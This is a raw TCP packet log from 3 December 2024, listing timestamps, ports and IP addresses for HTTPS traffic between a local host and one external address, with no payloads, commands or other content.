Dec 3, 2024 14:27:54.459759951 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.459804058 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.459863901 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.459882975 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.459901094 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.459919930 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.459954977 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.476737976 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.476886034 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.476978064 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.477051020 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.477077007 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.507329941 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.523332119 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.523853064 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.523998022 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.524291992 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.524354935 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.524385929 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.567334890 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.567734003 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.567914009 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.567930937 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.568022966 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.596817017 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.596990108 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.597012997 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.597186089 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.597215891 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.615340948 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.643335104 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.645347118 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.645426989 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.645454884 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.645503998 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.645529985 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.645550013 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.645673990 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.645840883 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.687338114 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.717636108 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.719710112 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.719759941 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.719779968 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.720510006 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.720540047 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.720592022 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.759282112 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.759413004 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.759484053 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.759562969 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.759594917 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.764996052 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.765012026 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.765100956 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765129089 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.765485048 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765501976 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.765546083 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765590906 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765624046 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765683889 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765726089 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765767097 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.765813112 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.767324924 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.807334900 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.807576895 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.807713985 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.808044910 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.808083057 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.808083057 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.808105946 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.808125973 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.808125973 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.836833000 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.837080002 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.837126017 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.837275982 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.837315083 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.851331949 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.851469994 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.851553917 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.851809025 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.851939917 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.883330107 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.885550022 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.885628939 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.885741949 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.885822058 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.885874987 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.885904074 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.885904074 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.885973930 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.886904955 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.886919975 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.887023926 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.887056112 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887069941 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.887125015 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887137890 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.887191057 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887257099 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887301922 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887372017 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887425900 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.887450933 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.888017893 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.888041019 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.888082981 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.888088942 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.888221979 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.888228893 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.888251066 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.888267040 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.888276100 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.892218113 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.935327053 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.943217993 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.943377018 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.943398952 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.943566084 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.943600893 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.956643105 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.956832886 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.956883907 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.956893921 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.957027912 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.957063913 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.957077980 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.987325907 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:54.987437963 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.987637043 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.987652063 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.987896919 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:54.987957954 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.000169992 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.000241995 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.000741005 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.000761986 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.000909090 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.003326893 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.005784035 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.005822897 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.005916119 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.006072044 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.006102085 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.006127119 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.007859945 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.007941961 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.007986069 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.008027077 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.008049965 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009104013 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.009166956 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.009210110 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009227037 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.009236097 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009427071 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009438992 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.009490013 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009596109 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009603977 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009618044 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009686947 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009727955 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009735107 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009749889 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009776115 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.009848118 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010554075 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.010620117 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.010741949 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.010862112 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010895967 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010921001 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010926962 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010932922 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.010945082 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010952950 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.010963917 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010971069 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.010979891 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.010992050 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.011070967 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011205912 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011214018 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.011301994 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011346102 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011385918 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011421919 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011466026 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011508942 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011548996 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011571884 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011637926 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.011671066 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.012595892 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.012609959 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.012717009 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.012723923 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.012738943 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.012917042 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.012964010 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.013025045 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.013084888 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.013144970 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.013205051 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.013228893 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.013437033 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.014580011 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.014700890 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.014811993 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.014858007 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.014879942 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.055325985 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.055325985 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.055541039 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.055794001 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.066112995 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.066350937 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.066385984 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075253963 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.075356960 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.075397015 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075650930 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075699091 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075742006 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075748920 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075766087 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075814009 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.075853109 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.077455044 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.077470064 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.077533007 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.077539921 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.077728987 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.077735901 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.077800035 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.077840090 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.077965021 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078031063 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078068972 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078104019 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078144073 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078176022 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078217983 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.078233957 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.079649925 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.079687119 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.080142975 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.080159903 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.080171108 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.080296040 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.080313921 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.080315113 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.080384970 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.080426931 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.084062099 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.084142923 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.084408998 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.084434986 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.084557056 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.121973991 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.122014999 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.122112036 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.122215986 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.122339010 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.122397900 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.122448921 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.122495890 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.122514009 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.122692108 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.126516104 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.126602888 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.128283978 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.131331921 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.133721113 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.241906881 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.242027998 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.242264032 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.242307901 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.242321968 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.287328005 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.287451029 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.287676096 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.287708998 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.335325956 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.509673119 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.511720896 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.511758089 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.514384985 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.555326939 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.630914927 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.631728888 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.631763935 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.632833004 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.632985115 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633014917 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633112907 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633167982 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633233070 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633276939 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633294106 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.633443117 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.679332018 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.679701090 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.727330923 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.753870964 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.759685993 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.759717941 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.763684988 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.763711929 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.811327934 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.875432014 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.875610113 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.875643015 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.875653982 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.875822067 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.875839949 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.879247904 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.879334927 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.879529953 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.879556894 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.879640102 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:55.927328110 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:55.998842955 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:56.002866030 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:56.243956089 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:57.696118116 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:57.696198940 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:57.696265936 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:57.696695089 CET	49758	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:57.696712971 CET	443	49758	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:57.705430984 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:57.705478907 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:57.705534935 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:57.705790043 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:57.705801964 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:58.248809099 CET	443	49761	149.154.167.220	192.168.2.5
